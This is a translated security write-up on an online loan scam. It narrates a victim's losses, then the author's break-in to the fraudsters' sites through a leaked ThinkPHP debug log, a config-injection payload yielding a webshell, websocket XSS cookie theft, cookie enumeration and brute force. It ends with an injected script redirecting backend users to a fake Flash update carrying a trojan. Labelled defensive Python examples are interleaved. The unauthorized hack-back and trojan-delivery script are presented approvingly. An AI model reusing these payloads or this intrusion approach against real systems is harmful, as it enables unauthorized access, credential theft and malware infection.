
Title: Record and analyze the online loan fraud chain


0x00 Overview

One day, an online friend told the author that he had been scammed, and in an unusual way: because he had no money, he chose to take out a loan, and was scammed during the loan process itself.

Scam text message [image]

0x01 Fraud process

(The victim is referred to here as Xiaohui.)

One day, Xiaohui received a text message about online loans on his mobile phone. It happened to be the end of the month and money was tight, so Xiaohui could not resist the temptation to download and open the app. After registering an account and filling in his ID number, a handheld ID photo, work location, family information and so on, he applied for a loan of 20,000 yuan, but it did not arrive for a long time. Xiaohui asked customer service and was told: "Dear, you need to pay a VIP fee of 688 first before the loan can be approved. After payment, the VIP fee will be transferred to your bank card together with the loan amount." Xiaohui thought it over, decided he would not lose any money, and paid for VIP treatment in order to cover next month's rent.

Having paid for VIP treatment, Xiaohui thought he would get the loan before the end of the month, but he still received neither the loan amount nor the VIP fee. This time customer service contacted Xiaohui on their own initiative: "Your credit limit is not enough. You need to transfer another 3,500 yuan in cash to prove your repayment ability. After payment, the fee will be transferred to your bank card together with the loan amount."

Xiaohui was anxious. With next month's rent gone, he gritted his teeth, borrowed 3,500 yuan from a friend, and transferred it to the bank card number provided by customer service. He thought: no more excuses this time, hand over the 20,000 yuan! Xiaohui had already planned how to eat, drink and enjoy himself once the 20,000 yuan arrived.

However, the goddess of luck still did not look after Xiaohui. Customer service contacted him again and said that the application had been approved and the payment was about to be made, but a further fee of 3,000 yuan was required, which would again be transferred to his bank card together with the loan amount. Xiaohui was stunned. Customer service then sent Xiaohui a fake contract generated by the backend.

[image: fake contract]

Xiaohui was anxious: he had only tried to take out a loan, yet he had lost several thousand yuan and it would be on his credit report, and the loan itself had still not arrived. Seeing the situation getting worse and worse, Xiaohui came to me. After hearing his description, I examined the loan software on Xiaohui's phone and told him, helplessly, that he had been scammed and the money would not come back. Xiaohui was stunned and shed tears of regret.

PS: The above is the real fraud process; the embellishments in the narrative are mine. The author also briefly analyzed and recorded two sets of fraud source code that are common on the market.

0x02 Vulnerability Analysis

1. First set of source code: vulnerability analysis

(1) ThinkPHP log leak [image]

Developed on ThinkPHP 3.2.3, with the front end and back end separated. [image]

Debug mode is enabled by default, so the log files leak SQL statements and exception output. [image] Constructed payload path: App/Runtime/Logs/21_10_16.log

[image]

The leaked logs contain the account and password from the admin table, which were used to enter the backend. [image]
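From the defender's side, the leak above is visible in the web server access log: every successful request for a path under the ThinkPHP Runtime directory is an exposure, and every 404 for such a path is a probe. The following Python detector is an added example and not code from the original article or from any of the software it analyzes; the access-log lines, IP addresses and date are constructed, and the only assumption about the target is that its runtime directory is served under a path containing /Runtime/ (as the page's own payload path shows).

```python
import re
from dataclasses import dataclass

# Constructed sample lines in Apache/Nginx combined log format (not taken from the page).
SAMPLE_LOG = """\
203.0.113.7 - - [16/Oct/2021:10:01:02 +0800] "GET /index.php/Home/Index/index HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [16/Oct/2021:10:01:09 +0800] "GET /App/Runtime/Logs/21_10_16.log HTTP/1.1" 200 88213 "-" "Mozilla/5.0"
198.51.100.4 - - [16/Oct/2021:10:02:11 +0800] "GET /App/Runtime/Logs/21_10_15.log HTTP/1.1" 404 162 "-" "curl/7.68.0"
203.0.113.7 - - [16/Oct/2021:10:03:40 +0800] "GET /App/Runtime/Data/_fields/db.admin.php HTTP/1.1" 200 1204 "-" "Mozilla/5.0"
"""

# ThinkPHP 3.2 keeps Logs, Cache, Data and Temp under Runtime; none of it should be web-reachable.
RUNTIME_RE = re.compile(r"/Runtime/", re.IGNORECASE)
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


@dataclass
class Finding:
    ip: str
    ts: str
    path: str
    status: int
    kind: str  # "exposed" when the server actually served the file, "probe" otherwise


def scan_access_log(text: str) -> list[Finding]:
    """Return one Finding per request that touched the Runtime directory."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m.group("path").split("?", 1)[0]
        if not RUNTIME_RE.search(path):
            continue
        status = int(m.group("status"))
        kind = "exposed" if 200 <= status < 300 else "probe"
        findings.append(Finding(m.group("ip"), m.group("ts"), path, status, kind))
    return findings


def summarize(findings: list[Finding]) -> dict[str, dict[str, int]]:
    """Count exposures and probes per client IP, which is what an alert should carry."""
    by_ip: dict[str, dict[str, int]] = {}
    for f in findings:
        by_ip.setdefault(f.ip, {"exposed": 0, "probe": 0})[f.kind] += 1
    return by_ip


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.kind:8} {f.ip:15} {f.status} {f.path}")
    print(summarize(scan_access_log(SAMPLE_LOG)))
```

Any "exposed" hit means the fix is overdue: set APP_DEBUG to false in the ThinkPHP config and deny web access to the Runtime directory at the web server, so that even a forgotten debug flag does not turn the log directory into a credential dump.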

(2) Controllable array leading to RCE: the list of uploadable file names is passed directly in the request packet. [image]

It was guessed here that the backend stores the uploadable file names in an array (a guess confirmed later, after obtaining the webshell).

Add php to the uploadable file names, then upload a file to get a webshell.

Checking the corresponding configuration file shows that the allowed suffixes are stored in an array. Here it is also possible to getshell by inserting a string that closes the array. [image]

payload: siteName=11111').phpinfo();//

[image]

Looking at how the backend handles this: because it returns an array, the string concatenation operator '.' has to be included in the payload. [image]

Log in to the backend to check whether the payload was executed. [image]
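Both defects in this subsection come from the same design: the backend writes admin-submitted settings into a PHP configuration file by string concatenation, and the upload allowlist is whatever array that file happens to contain. The PHP source of the backend is not shown on the page, so the following Python block is an added illustration of that pattern rather than the project's own code; it renders the vulnerable writer beside a hardened one and pairs it with an upload check that hard-denies server-executable extensions regardless of what an administrator (or an attacker holding the admin session) puts into the configurable list. The extension set is a constructed choice, not a list taken from the page.

```python
import re

# Extensions a PHP web server may execute; never allowed even if the admin list contains them.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "pht", "phps", "inc"}
SAFE_KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def php_single_quoted(value: str) -> str:
    """Emit a PHP single-quoted literal; only backslash and quote need escaping inside it."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def build_config_unsafe(settings: dict) -> str:
    # Vulnerable pattern (illustrative): raw values are concatenated into PHP source,
    # so a value containing a quote ends the literal and the rest becomes code.
    lines = ["<?php", "return array("]
    for key, value in settings.items():
        lines.append("    '" + key + "' => '" + value + "',")
    lines.append(");")
    return "\n".join(lines)


def build_config_safe(settings: dict) -> str:
    """Hardened writer: validated keys, properly escaped PHP string literals."""
    lines = ["<?php", "return array("]
    for key, value in settings.items():
        if not SAFE_KEY_RE.match(key):
            raise ValueError(f"invalid config key: {key!r}")
        lines.append(f"    {php_single_quoted(key)} => {php_single_quoted(str(value))},")
    lines.append(");")
    return "\n".join(lines)


def normalize_upload_exts(requested) -> list[str]:
    """Keep the configurable allowlist, but silently drop executable or malformed entries."""
    allowed: list[str] = []
    for ext in requested:
        ext = ext.strip().lower().lstrip(".")
        if not ext or not ext.isalnum() or ext in EXECUTABLE_EXTS:
            continue
        if ext not in allowed:
            allowed.append(ext)
    return allowed


def is_upload_allowed(filename: str, allowed: list[str]) -> bool:
    """Judge by every dotted component, so shell.php.jpg is refused along with shell.php."""
    name = filename.rsplit("/", 1)[-1].lower()
    if "." not in name or name.startswith("."):
        return False  # no extension, or a dotfile such as .htaccess
    parts = name.split(".")[1:]
    if any(p in EXECUTABLE_EXTS for p in parts):
        return False
    return parts[-1] in allowed


if __name__ == "__main__":
    payload = "11111').phpinfo();//"  # the page's own payload, used here only as input
    print(build_config_unsafe({"siteName": payload}))
    print(build_config_safe({"siteName": payload}))
    exts = normalize_upload_exts(["jpg", "PNG", "php", ".gif", "phtml"])
    print(exts, is_upload_allowed("shell.php.jpg", exts))
```

The safe writer keeps the injected quote inside the literal, so the configuration stays data; the upload check then makes the allowlist itself harmless even if someone edits it through the backend.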

2. Second set of source code: vulnerability analysis

(1) Customer service module: websocket XSS. The author's capabilities are limited. The second set of fraud loan source code appears to be a one-click deployment; all of these sites run the latest version of BT Panel (Baota) with the free Baota WAF, which prevented obtaining server permissions, so the breakthrough point was sought in the customer service module instead.

Front page [image]

Find the customer service entrance and upload an image; the upload is carried in a data packet sent over the websocket.

Modify the websocket packet and construct XSS. [image]

Cookie obtained. [image]
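The XSS above works because the customer service server relays whatever the client put in the websocket frame, and the cookie theft works because the session cookie is readable from script. The following Python block is an added example, not code from the customer service product the page describes, showing the server-side handling such a chat should have: a strict schema, HTML escaping of text, an image field that only accepts a server-local path with an image extension, and a session cookie issued with HttpOnly. The frame samples and the /uploads/ path convention are constructed for the example.

```python
import html
import json
import re

ALLOWED_TYPES = {"text", "image"}
# Only a server-assigned file name under the upload prefix; no schemes, no traversal.
IMAGE_URL_RE = re.compile(r"^/uploads/[A-Za-z0-9_\-]+\.(?:png|jpe?g|gif|webp)$")
MAX_TEXT = 2000


class InvalidMessage(ValueError):
    """Raised for any inbound frame that does not match the expected schema."""


def sanitize_ws_message(raw: str) -> dict:
    """Parse one inbound websocket frame body and return the safe outbound message."""
    try:
        msg = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise InvalidMessage("not JSON") from exc
    if not isinstance(msg, dict) or msg.get("type") not in ALLOWED_TYPES:
        raise InvalidMessage("unknown message type")
    out = {"type": msg["type"]}
    if msg["type"] == "text":
        body = msg.get("content")
        if not isinstance(body, str) or len(body) > MAX_TEXT:
            raise InvalidMessage("bad text body")
        # Escape before relaying so the agent's browser renders markup as text.
        out["content"] = html.escape(body, quote=True)
    else:
        url = msg.get("url")
        if not isinstance(url, str) or not IMAGE_URL_RE.match(url):
            raise InvalidMessage("bad image url")
        out["url"] = url
    # Sender identity is deliberately not copied from the frame; the server fills it
    # in from the authenticated session when broadcasting.
    return out


def is_rejected(raw: str) -> bool:
    try:
        sanitize_ws_message(raw)
        return False
    except InvalidMessage:
        return True


def session_cookie(value: str) -> str:
    """Set-Cookie value that keeps the session token out of document.cookie."""
    return f"sid={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


# Constructed frames for the example (not captured traffic).
SAMPLES = [
    '{"type":"text","content":"hello, I need a loan"}',
    '{"type":"text","content":"<img src=x onerror=alert(document.cookie)>"}',
    '{"type":"image","url":"/uploads/abc123.png"}',
    '{"type":"image","url":"javascript:alert(1)"}',
    '{"type":"image","url":"/uploads/../../config.php"}',
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print("rejected" if is_rejected(raw) else sanitize_ws_message(raw))
    print(session_cookie("example-token"))
```

Even with perfect escaping, HttpOnly is the control that would have stopped the cookie from leaving the browser; the two belong together.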

3. Customer service system control / PC control

3.1 Controlling the database

Log in to the MySQL database to view the fraud suspect's login IP. [image]

The IP is a dynamic address from a telecom base station in Hangzhou, judged to be a home router, and so far has no traceability value. [image]

0x03 Control of the customer service system

The customer service system of the first set of fraud source code is an online customer service product. [image]

While browsing the backend, I found the login address of the customer service backend. The front end reported a wrong password for the account, but brute-forcing the account did not succeed. [image]

The author then registered an account on the customer service system himself, iterated over the adminid and uid values in the Set-Cookie headers, and successfully escalated privileges to obtain the customer service account.
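The privilege escalation above works because the customer service backend trusts identity values (adminid, uid) that the client sends back in cookies. The Python block below is an added example, not code from the customer service product on the page, contrasting that pattern with the correct one: the only client-held value is an opaque, HMAC-signed session id, and both identity and role are resolved from a server-side store. Cookie names, roles and the in-memory store are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

# Per-process signing key for the example; a real deployment loads it from protected config.
SERVER_KEY = secrets.token_bytes(32)


def sign(token: str) -> str:
    """Append an HMAC so a forged or modified session id fails verification."""
    mac = hmac.new(SERVER_KEY, token.encode(), hashlib.sha256).hexdigest()
    return f"{token}.{mac}"


def verify(cookie_value: str):
    """Return the bare token if the signature checks out, else None."""
    token, sep, mac = cookie_value.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, token.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return token


class SessionStore:
    """Server-side sessions: the client never holds uid or role, only the signed id."""

    def __init__(self):
        self._sessions: dict[str, dict] = {}

    def create(self, uid: int, role: str) -> str:
        token = secrets.token_urlsafe(32)  # URL-safe alphabet never contains '.'
        self._sessions[token] = {"uid": uid, "role": role}
        return sign(token)

    def resolve(self, cookie_value: str):
        token = verify(cookie_value)
        return None if token is None else self._sessions.get(token)


def can_view_agent_panel(store: SessionStore, cookies: dict) -> bool:
    """Authorization derives only from the server-side session, never from uid/adminid cookies."""
    sess = store.resolve(cookies.get("sid", ""))
    return bool(sess) and sess["role"] == "agent"


def can_view_agent_panel_insecure(cookies: dict) -> bool:
    # The broken pattern this section describes: a client-supplied identifier is the check.
    return cookies.get("adminid", "0") != "0"


if __name__ == "__main__":
    store = SessionStore()
    agent = store.create(uid=7, role="agent")
    visitor = store.create(uid=42, role="visitor")
    print(can_view_agent_panel(store, {"sid": agent}))
    print(can_view_agent_panel(store, {"sid": visitor, "adminid": "1", "uid": "7"}))
    print(can_view_agent_panel_insecure({"adminid": "1"}))
```

With this layout, enumerating adminid or uid changes nothing, and tampering with the signed id only produces a verification failure that is worth logging as a probe.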

[image]

The account name is in Chinese. [image]

Obtained the password by brute force. [image]

Log in to the customer service backend.

The entire fraud tactic chain [image]

Chat history with victims


0x04 Flash phishing

After gaining control of the fraud app's server, the author tried flash phishing in an attempt to control the personal PCs of the fraud gang.

The script is inserted into the file that the backend redirects to after a successful login, and it then redirects to the prepared fake flash update page.

Prepare in advance: a fake flash domain (preferably containing the word 'flash') hosting an AV-evading trojan.

<script>
// Replace alert() with one that fires from a throwaway hidden data: iframe,
// then show the fake "upgrade" prompt and redirect to the prepared page.
window.alert = function (name) {
    var iframe = document.createElement('IFRAME');
    iframe.style.display = 'none';
    iframe.setAttribute('src', 'data:text/plain,');
    document.documentElement.appendChild(iframe);
    window.frames[0].window.alert(name);
    iframe.parentNode.removeChild(iframe);
};
alert('Your FLASH version is too low, please try to upgrade and access the page after changing it!');
window.location.href = 'https://www.flashxxxx.com';
</script>

Effect:

Enter the account and password and log in; at this point the JavaScript above is loaded. [image]

Clicking 'Confirm' redirects to the prefabricated flash update page, which induces the user to click and download. [image]

But in the end it was not triggered. From the logs it was found that the fraud gang logged into the backend, which is a small regret.

0x05 Summary

A typical feature of online loan fraud cases is that the suspect lures victims who need loans with the gimmick of "no collateral and no review", collects a deposit in the name of "account freezing and unfreezing" to complete the loan, and then charges again in the name of insurance premiums, activation fees, service fees and so on. In order to recover the money already paid, the victim can only keep transferring according to the entire process the suspect has designed, and ends up defrauded. Self-employed people who urgently need money, office workers with a habit of spending ahead of their income, college students and similar groups are especially vulnerable.

The scammers have even extended their reach to Hong Kong, Taiwan and overseas.

According to the analysis, this group of fraud gangs has carried out the same fraudulent method in Brazil, and the fraud source code used is the first set of source code analyzed above.

More than 500 victims in Brazil.


The net of heaven is vast, and though its meshes are wide, nothing slips through! All who do evil will be severely punished by the law!

Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247502166idx=1sn=3fe78999b5b43a059e66975dd185b3ccchksm=ce6463cff913ead9c3a448d7466b7c38ed593a709918265283387ad4bb787292bdd2979e7d64scene=21#wechat_redirect
https://xz.aliyun.com/t/10391
